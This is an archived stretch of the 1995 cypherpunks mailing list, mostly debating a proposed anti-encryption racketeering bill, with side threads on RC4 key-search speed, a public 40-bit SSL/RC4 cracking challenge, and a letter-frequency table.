From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 13 Jul 95 05:58:34 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Re: LOU_nex
In-Reply-To: <199507131252.IAA01827@pipe3.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950713085642.25760A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, John Young wrote:

> Date: Thu, 13 Jul 1995 08:52:50 -0400
> From: John Young <jya@pipeline.com>
> To: cypherpunks@toad.com
> Subject: LOU_nex 
> 
>    7-13-95. NYPaper Page Oner:
> 
> 
>    "Senior F.B.I. Agent Suspended in Probe Of a Deadly Siege."
> 
>       The Federal Bureau of Investigation has suspended a
>       senior career agent as a result of a Justice Department
>       inquiry into whether officials destroyed important
>       documents about the agency's bloody 1992 standoff with
>       a white separatist in Idaho, law-enforcement officials
>       said today. The suspension of the agent, E. Michael
>       Kahoe, who was an official at F.B.I. headquarters during
>       the Idaho siege, sent a shock wave through the agency's
>       upper ranks.

Lemme guess, suspended to the Bahamas while the promotion committee meets.

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 13 Jul 95 01:31:32 PDT
To: cypherpunks@toad.com
Subject: Re: general RC4 key searcher: optimisations anyone?
In-Reply-To: <9507121753.AA08575@vail.tivoli.com>
Message-ID: <Pine.SOL.3.91.950713092431.1552C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Mike McNally wrote:

> Jonathan Shekter writes:
>  > >After all, the kind of really high powered systems that can make a
>  > >large dent in the key space are not running Windows NT.
>  > 
>  > 	Umm... ever hear of an Alpha?

When I stuck that comment in I had in mind the message that appeared here 
in the list from someone at maspar.com, where their machines make our 
workstations look rather pedestrian.  Agreed, though, Alpha's are nice 
(I'm typing this message on one).

> Also, I've been quite impressed with the Pentium times.  It must have
> something to do with the "friendliness" towards byte operations in the
> Intel architecture.

The Pentium's integer performance in general is very good, right up there 
with the more expensive Sparc according to the figures I saw in one of 
the linux newsgroups a while back.  Unfortunately the same cannot be said 
for the relative performance of its FPU, Intel needs to do a lot of work 
there to catch up.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@coyote.csusm.edu (Marshall Clow)
Date: Thu, 13 Jul 95 09:43:23 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <ac2afc0c00021003cf47@[144.37.6.21]>
MIME-Version: 1.0
Content-Type: text/plain


No one seems to have pointed this out, so:
(maybe it's obvious to everyone else)

>    "Sec. 1030A.  Racketeering-related crimes involving computers
>      "(a) It shall be unlawful--
>
>   . . .
>
>         "(2) to distribute computer software that encodes or encrypts
>       electronic or digital communications to computer networks that the
>       person distributing knows, or reasonably should know, is accessible to
>       foreign nationals and foreign governments, regardless of whether such
>       software has been designated nonexportable."
>
    IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim
May, that I have just "distributed computer software .... to a computer
network ...accessible to foreign nationals ..." even though it was
"private" e-mail.

   Comments, anyone?   Anyone? Bueller? ;-)


>Get a copy of this bill from:
>                ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP
>and read it.
>
   Betcher ass.

-- Marshall
"The constitution. It's not perfect, but it's a damn sight better than what
we've got."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Billson <bob@kc2wz.bubble.org>
Date: Thu, 13 Jul 95 07:42:09 PDT
To: cypherpunks@toad.com
Subject: Re: LOU_nex
Message-ID: <9507131009.AA11503@kc2wz.bubble.org>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <access.digex.net!unicorn> wrote:
>>       Kahoe, who was an official at F.B.I. headquarters during
>>       the Idaho siege, sent a shock wave through the agency's
>>       upper ranks.
>
>Lemme guess, suspended to the Bahamas while the promotion committee meets.

...soon to be followed with retirement at full government pension.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 13 Jul 95 07:13:42 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507131412.KAA07969@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:20 PM 7/12/95 -0400, Brian A. LaMacchia wrote:
>Finally, we begin to see the attack on all forms of un-escrowed
>encryption.  The bill provides an affirmable defense of
>giving the keys to the government ahead of time!
>
>            `(c) It shall be an affirmative defense to prosecution under this
>          section that the software at issue used a universal decoding device
>          or program that was provided to the Department of Justice prior to
>          the distribution.'.

We'll just supply the feds with some of the key testing code developed for
collective cracking of RSA-129 or RC4.  That code is "a universal decoding device or program."  All it takes is a few years... <g>

DCF

"Since the Occupational Safety and Health Administration started 'protecting' us, there has been no significant decline in work place injuries." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 13 Jul 95 07:18:45 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507131412.KAA07969@panix.com>
Message-ID: <Pine.SUN.3.91.950713101705.366A-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Duncan Frissell wrote:

> Date: Thu, 13 Jul 1995 10:12:51 -0400
> From: Duncan Frissell <frissell@panix.com>
> To: bal@martigny.ai.mit.edu
> Cc: cypherpunks@toad.com
> Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
> 
> At 06:20 PM 7/12/95 -0400, Brian A. LaMacchia wrote:
> >Finally, we begin to see the attack on all forms of un-escrowed
> >encryption.  The bill provides an affirmable defense of
> >giving the keys to the government ahead of time!
> >
> >            `(c) It shall be an affirmative defense to prosecution under this
> >          section that the software at issue used a universal decoding device
> >          or program that was provided to the Department of Justice prior to
> >          the distribution.'.
> 
> We'll just supply the feds with some of the key testing code developed for
> collective cracking of RSA-129 or RC4.  That code is "a universal decoding device or program."  All it takes is a few years... <g>

We need stealth encryption.

PERIOD.


> 
> DCF
> 
> "Since the Occupational Safety and Health Administration started
> 'protecting' us, there has been no significant decline in work place 
> injuries."


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 13 Jul 95 10:17:24 PDT
To: cypherpunks@toad.com
Subject: Re: CRYPTO: Anti-Electronic Racketeering Act of 1995
Message-ID: <199507131715.KAA17445@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>		ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP

Sigh.  The EFF moves out of Washington for _15_minutes_ and what happens?  :-)
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 13 Jul 95 10:18:55 PDT
To: cypherpunks@toad.com
Subject: VENONA web page
Message-ID: <199507131718.KAA24249@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Check out http://www.fas.org/pub/gen/fas/irp/venona/

	Jim Gillogly
	Highday, 20 Afterlithe S.R. 1995, 17:18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@coyote.csusm.edu (Marshall Clow)
Date: Thu, 13 Jul 95 10:25:40 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <ac2b06a9060210034dbc@[144.37.6.23]>
MIME-Version: 1.0
Content-Type: text/plain


>    "Sec. 1030A.  Racketeering-related crimes involving computers
>      "(a) It shall be unlawful--
>   . . .
>         "(2) to distribute computer software that encodes or encrypts
>       electronic or digital communications to computer networks that the
>       person distributing knows, or reasonably should know, is accessible to
>       foreign nationals and foreign governments, regardless of whether such
>       software has been designated nonexportable."
>
So much for compression software, too. :-(
Pst! Anyone want a copy of gzip? PKZip? Drop*Stuff?

-- Marshall


Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu
Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfmesq@ibm.net (James F. Marshall)
Date: Thu, 13 Jul 95 14:18:17 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507132116.VAA149322@smtp-gw01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>In the subsection that explicitly mentions crypto, it says that it's
>unlawful to put (non-GAK) crypto on an open net, "regardless of 
>whether such software has been designated non-exportable". If the 
>phrase "nonexportable" means the same thing in the context of this 
>subsection, then provision (b) would only seem to apply RICO to stuff 
>that already falls under ITAR.

Pardon me if I misunderstood your point.  I haven't read the whole
bill, but I read the "regardless" phrase with a different emphasis. 
In short, that language appears to mean that one could be pounded with
RICO for uploading crypto software even if the crypto is EXPORTABLE.

The part about subsequent instances of actual access to non-exportable
crypto by foreigners, etc. appears to address a different situation --
the situation where the crypto is non-exportable.  In this different
and much more "defiant" situation, the language would allow the feds
to count predicate acts, not merely according to the actual instances
of uploading activity, but also according to the number of times the
crypto is downloaded by foreigners, etc.  Perhaps a 10,000 to 1 ratio?

It is unclear, not having read the entire bill, whether the onerous
provision in the case of non-exportable crypto would apply in the case
of exportable crypto.  Perhaps our resident federal prosecutor might
volunteer some insights into how the government might prove thousands
of predicate acts, and thus a huge pattern of racketeering activity, 
as a result of a defendant uploading non-exportable crypto once to one
site, and how the government might argue that uploading exportable 
crypto once to one known mirrored site (e.g., hobbes) would constitute
uploads to all the mirrors -- i.e., multiple predicate acts.

This email is academic speculation.  This email is not legal advice,
is not a consultation with counsel, and does not create an attorney-
client relationship.  (As a condition of entering into an attorney-
client relationship, I require a formal, ink-signed fee agreement.)

- --Jim


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAVmsEK9bzU1tDCZAQGOcAP/StGc/+/sbRCZLRJTwnhMGtda3Z7tYQ6G
QhllCCwGZ0gddwtCmH98hQaQLAbGaFyaUd4SroM3bj3/NXX2xFucnY9ogPN2LHS9
9MZ/RzBO33iVjl/F0fHAIJiCnGCkHM58Gftgtg7gyOKCs+wBkJNQgOxsuuxw2rSs
/nlYAv+ukN8=
=wCJA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 10:45:27 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Bubba
Message-ID: <ac2aa9b7090210045e71@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:19 PM 7/13/95, Robert A. Hayden wrote:

>40,000,000 acts.  Welcome to a 6x6 cell with a roommate named Bubba that
>wants to make you his wife.

Careful here, Robert!

Bubba has not yet been tried and convicted.

I admit that the allegations about Mena, drugs, Whitewater, S & Ls, and
abuse of state office are fairly serious, but he has not yet even been
formally charged.

--Tim May



..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Thu, 13 Jul 95 07:56:36 PDT
To: cypherpunks@toad.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <Pine.3.89.9507131057.A1888-0100000@l0pht>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> wrote:
---------------Original Message---------------
We'll just supply the feds with some of the key testing code developed for
collective cracking of RSA-129 or RC4.  That code is "a universal 
decoding device or program."  All it takes is a few years... <g>

DCF
----------End of Original Message----------

That raises an interesting issue.  How difficult to use or how time 
consuming can a program or method be to be considered "a universal 
decoding device or program."  Can I give the feds a program that will 
crack my messages in a few days when run on one of their supercomputers?
If this is not acceptable what will be their rational?

Will they have to invent a huge new bureaucracy to manage all these 
devices and programs?  Theoretically, every person in the US could submit 
many different devices and programs.  One could bank on the feds losing 
or misplacing your program if they were innundated enough.  Can you 
destroy your only copy of the "universal decoding program" after giving 
them their copy?  Does every message or file I encrypt need a cleartext 
header that describes which of my escrowed devices or programs wil decrypt 
it? 

There are many problems with this idea of Government Access to Devices or 
Programs (GADOP).  A toolset that could build many different encryption 
and decryption variations based on psuedo-random input may be a good tool 
to fight this nonsense.
 
      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM
Date: Thu, 13 Jul 95 11:03:52 PDT
To: perry@imsi.com
Subject: Re: Anti-Electronic Racketeering Act of 1995
Message-ID: <9507131806.AA01162@homeboy.local>
MIME-Version: 1.0
Content-Type: text/plain


>>     IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim
>> May, that I have just "distributed computer software .... to a computer
>> network ...accessible to foreign nationals ..." even though it was
>> "private" e-mail.
>
>Depends on how "computer network" is defined in the statute.

Its added language.  "computer network" is not defined.  Catcha' 22.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 13 Jul 95 11:07:33 PDT
To: cypherpunks@toad.com
Subject: Crisis Overload (re Electronic Racketeering)
Message-ID: <ac2aab2c0b021004b5fe@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Folks, I'm not going to exhort you to fight this latest travesty, to send
angry letters to your senators and representatives.

Every couple of months there's been a new legislative attack on what were
once basic American freedoms. (Sorry to focus on America. I'm sure you
folks in the liberty-loving paradises of, say, Germany, are gloating over
our hand-wringing.)

We're losing the war. We can send in donations to the NRA and EFF, offer
our support to the ACLU and EPIC, but the tide just keeps rolling in,
washing away our efforts. The full-time lawmakers in D.C. can proliferate
new repressive laws much faster than we can fight them.

Our focus on this list has been on crypto, and crypto is finally coming
under the massive assault we knew would come from the earliest rumblings
several years ago about "key escrow." Clipper was the warning shot, the
current "War on the Internet" (fed by scare stories and hysteria) is part
of the propaganda war, and now this bipartisan bill to expand the RICO Act
to include any non-GAK implementation of crypto is the nail in the coffin.

No wonder Stu Baker and Ron Lee were so smug at the last CFP.

Ordinary lobbying is probably a lost cause. The EFF tried to "work with"
the government (Administration, Congress) on the Digital Telephony Bill,
and got rolled (in the opinion of many, even in the governing circles of
EFF).

This latest assault is probably unstoppable. The co-sponsorship by Sen.
Leahy, once seen as an ally of the EFF (recall the attempts to get the
Leahy alternative to Exon adopted), and the enthusiastic support of
Republicans, Democrats, and the intelligence community means that GAK is
coming.

Oh, and the use of RICO and "conspiracy" in such a central way fulfills
Whit Diffie's prediction of a few years ago that the main way crypto will
be controlled is through such laws, by spreading fear, uncertainty, and
doubt amongst users and corporations. Make the corporations so paranoid
that they'll crack down on employees, adopt GAK methods, and freeze out the
"street corner user" of crypto.

(If the only users of PGP and other non-GAK tools are fringe groups and
underground communities, then the main goals will have been achieved. The
public use of PGP will have been squelched, the public use of anonymous
cash will have been suppressed, and the social control goals will have been
achieved. )

I think it's time to abandon all lobbying efforts...they don't appear to be
working, and the government is proliferating new laws faster than we can
fight them.

The only hope is to more rapidly deploy crypto, to reach the "point of no
return." Optimistically, we may already be there (the views expressed by
many of us). Pessimistically, the application of RICO laws and civil
forfeiture could put any of us who advocate crypto use and evasion of the
new laws into a precarious position.

This is enough to say for now.

Suffice it to say I view the latest Grassley proposed legislation to be the
culmination of the past several years worth of anti-liberty legislation. A
much bigger threat than Clipper.

In fact, it's what many of us saw implicit in Clipper.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Thu, 13 Jul 95 08:19:49 PDT
To: lmccarth@cs.umass.edu (L. McCarthy)
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131212.AA21613@cs.umass.edu>
Message-ID: <9507131519.AA17335@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: lmccarth@cs.umass.edu (L. McCarthy)
   Date: Thu, 13 Jul 1995 08:12:00 -0400 (EDT)
   Reply-To: cypherpunks@toad.com (Cypherpunks Mailing List)

   bal writes:
   > It's much worse than this.  Look at the definition of "predicate act":
   > 
   >             `(b) For purposes of this section, each act of distributing
   >           software is considered a separate predicate act. Each instance in
   >           which nonexportable software is accessed by a foreign government, 
   >           an agent of a foreign government, a foreign national, or an agent 
   >           of a foreign national, shall be considered as a separate predicate
   >           act.
   > 
   > Now, since the bill also makes 1030A violations "racketeering
   > activities", all you need are two predicate acts and RICO comes into
   > play.  

   In the subsection that explicitly mentions crypto, it says that it's
   unlawful to put (non-GAK) crypto on an open net, "regardless of whether such
   software has been designated non-exportable". If the phrase "nonexportable"
   means the same thing in the context of this subsection, then provision (b)
   would only seem to apply RICO to stuff that already falls under ITAR.

What worries me is the first sentence: "each act of distributing
software is considered a predicate act."  It's not clear to me whether
this applies to (a)(1) unlicensed software or (a)(2) encryption programs
(or perhaps both).  Notice that (a)(1) says "transfer" not "distribute".
Perhaps the act of putting Alleged-RC4 on a FTP site is one act and
mailing a copy to Cypherpunks is another act.  That might be two
distributions and thus two predicate acts.

					--bal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 09:19:32 PDT
To: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131519.AA17335@toad.com>
Message-ID: <Pine.ULT.3.91.950713111812.3076A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Brian A. LaMacchia wrote:

> What worries me is the first sentence: "each act of distributing
> software is considered a predicate act."  It's not clear to me whether
> this applies to (a)(1) unlicensed software or (a)(2) encryption programs
> (or perhaps both).  Notice that (a)(1) says "transfer" not "distribute".
> Perhaps the act of putting Alleged-RC4 on a FTP site is one act and
> mailing a copy to Cypherpunks is another act.  That might be two
> distributions and thus two predicate acts.

Of course, when you mail it to the cypherpunks list, the program goes to 
500+ people, sot hat's 500+ acts.  And who knows how many people connect 
to the FTP site, but everybody on the internet COULD connect, so that's 
40,000,000 acts.  Welcome to a 6x6 cell with a roommate named Bubba that 
wants to make you his wife.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 08:35:43 PDT
To: bal@martigny.ai.mit.edu
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <9507131519.AA17335@toad.com>
Message-ID: <9507131535.AA12389@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Brian A. LaMacchia" writes:
> What worries me is the first sentence: "each act of distributing
> software is considered a predicate act."

This breakup into seperate counts business is a common means of
striking terror into people. Its what gets done in the securities
industry, where if you mail a letter with an error in it to fifty
people it becomes fifty seperate counts of fraud and you can go to
jail for several hundred years even with parole. I'm not making this
up.

This law would also criminalize selling crypto software -- even
emasculated crypto software -- at Egghead, by the way. Remember, even
*if the crypto software is exportable* its a crime. It also would
criminalize the distribution of ROT-13. I'm not making either of these
things up.

I'll invoke Godwin's rule right now. The person who thought this up is
a Nazi. Its obviously not the Senator, who must be a dupe for some
national security types -- the Senator probably wouldn't know a crypto
program if it hit him on the head with a sledgehammer.  Its also
obvious that they don't think the whole thing will pass -- this is a
way of getting a "compromise" that merely outlaws all useful
encryption. "Compromise" in Washington-speak means "take down your
pants and prepare to be buggered."

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Thu, 13 Jul 95 09:03:12 PDT
To: cypherpunks@toad.com
Subject: Anti-Everything-Ever Act
Message-ID: <v02120d01ac2aaff901f4@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


Grassley's latest nonsense has got me thinking again about the rapidly
rising demonization of computers/networks/the net/etc. Remarks like...

>the wire fraud statute which has been successfully used by prosecutors for
>many use[r]s, will be amended to make fraudulent schemes which use computers
>a crime.

        ...boggle the mind, since it'd be all but impossible to commit wire
fraud _without_ involving a "computer." The obvious effect of legislation
crafted according this kind of pseudo-thought would/will be to ensure that
there's a very firm line between, bluntly, haves and have-nots--"haves"
being those who are exempted by various legal machinations from this
ever-expanding universe of recriminalizations of the same old actions. If
Arthur commits wire fraud, he's making use of telcos' "computers" and wires
to commit fraud; is his action qualitatively different if he uses NetPhone
or Maven to accomplish exactly the same deed? If he uses a 12-yr-old
answering machine in the process, he probably isn't using a "computer" to
commit wire fraud; but if he uses a brand-new digital machine, or his kids
got him a Compaq Presario, and he uses it for voice mail--he probably _is_
using a "computer." It can't reasonably be argued that the use of newer
technology has any effect whatsoever--but it can of course be legislated.
We're seeing more and more of this addle-headed legislation coming down the
pike, and more and more of it will eventually become law: the effect, above
all, will be to make just about any use of a computer potentially quite
dangerous. For example, lying about your income on a credit card
application is, I'm told, potential bank fraud; if things continue as they
are, soon enough Mary could get slapped with yet another charge for
printing answers on her dishonest application rather than writing them by
hand. That isn't in any legislation I've seen, but how far off can it be?
        I know, I know, I'm preaching to the choir... Why? I'm going to
start working on an essay (and if the wind blows right, it'll be an op-ed)
about this hazy question--not that op-eds have much effect. :( Anyway, if
any of y'all have archived remarks by various Kongress types, pointers, dim
memories about spectacularly stupid statements, please send them my way off
list: the essay's going to focus not on legislation per so but, rather, on
the remarks that'll show how little these guys understand and how dangerous
their incomprehension is.
        Much obliged,

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Thu, 13 Jul 95 11:11:47 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: DefCon roomshare?
In-Reply-To: <199507131639.MAA07472@spl.bwh.harvard.edu>
Message-ID: <Pine.3.89.9507131226.D6155-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Adam Shostack wrote:

> 	Also, I'm looking for a (English text) letter frequency table.
> Anyone have one online?

Did you just wnat the letters in order of frequency, or with a numeric 
distribution per 1000?

Here's just a list, although you should be able to whip out a quick C 
program to do both fairly quickly:

etaonrishdlfcmugypwbvkxjqz
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 13 Jul 95 09:23:27 PDT
To: Tim Scanlon <tfs@vampire.science.gmu.edu>
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <9507131048.AA09393@vampire.science.gmu.edu>
Message-ID: <Pine.SUN.3.91.950713122034.13737A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Tim Scanlon wrote:

> I can confirm this, and a story was broadcast on the local
> ABC news affiliate (WJLA) that talked about this and Waco
> some.

Interestingly enough, WJLA is on the net (note 
http://www.access.digex.net/~wjla/wjla.html)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 13 Jul 95 09:42:23 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: DefCon roomshare?
Message-ID: <199507131639.MAA07472@spl.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Anyone interested in sharing a room at DefCon?

	I'm fairly unobtrusive, don't smoke, and am neat enough to
live with for a few days. :)


	Also, I'm looking for a (English text) letter frequency table.
Anyone have one online?

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 13 Jul 95 12:46:37 PDT
To: cypherpunks@toad.com
Subject: Re:  SSL RC4 challenge
Message-ID: <199507131945.MAA02875@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Hal <hfinney@shell.portal.com>
> Here is a challenge to try breaking SSL using the default exportable
> encryption mode, 40-bit RC4.
> [...]

It has been pointed out to me that I made a mistake in my analysis of the
SSL packets.  The MAC at the beginning of the encrypted packets is itself
RC4 encrypted.  That means that the 17 bytes of known plaintext start 16
bytes into the stream, not at the beginning as I thought.  This just
means that after key setup, RC4 has to be cycled 16 times before we start
comparing its output with the XOR of the known plaintext and ciphertext.

I'll produce a revision of my "challenge".  If no other mistakes are
found I'll post it to sci.crypt.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 09:46:21 PDT
To: mclow@coyote.csusm.edu (Marshall Clow)
Subject: Re: Anti-Electronic Racketeering Act of 1995
In-Reply-To: <ac2afc0c00021003cf47@[144.37.6.21]>
Message-ID: <9507131646.AA12585@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Marshall Clow writes:
> >
> >         "(2) to distribute computer software that encodes or encrypts
> >       electronic or digital communications to computer networks that the
> >       person distributing knows, or reasonably should know, is accessible t
o
> >       foreign nationals and foreign governments, regardless of whether such
> >       software has been designated nonexportable."
> >
>     IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim
> May, that I have just "distributed computer software .... to a computer
> network ...accessible to foreign nationals ..." even though it was
> "private" e-mail.

Depends on how "computer network" is defined in the statute.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Thu, 13 Jul 95 12:51:38 PDT
To: cypherpunks@toad.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <B332ZVVSI9JDN*SADLER_C@SHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: Crisis Overload (re Electronic Racketeering)
Date: Thu, 13 Jul 1995 12:27:18 PDT
A1-type: DOCUMENT
Importance: normal


>On July 13, 1995, Robert Hayden said:

>Unfortunately, a system of social engineering needs to be adopted to get 
>massive use of cryptography started.  This means, and I advocated this 
>from the day I entered this forum, that programs such as PGP need to be 
>redesigned so that the a user friendly . . . so user friendly that any 
>Joe Moron can figure out not only how to use them, but also how it helps 
>them and how it is "good" for them.  This means that we need simplified 
>key management easy enough for the point-and-click masses to utilize.  
>...

>Unfortuately, all I can do is stand on the sidelines and cheer, because I 
>am not a programmer; I'm a user and a teacher.

Well put! I agree wholeheartedly! I have friends who are mostly teachers and
writers who are interested in encryption from what I've told them, but their
computer knowledge is pretty much limited to their word processors. A good
user interface would do wonders for spreading the use of PGP. Unfortunately
I am not a programmer either, but I am being motivated to become one. If
only there was more time...

Connie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alex <cp@proust.suba.com>
Date: Thu, 13 Jul 95 10:58:39 PDT
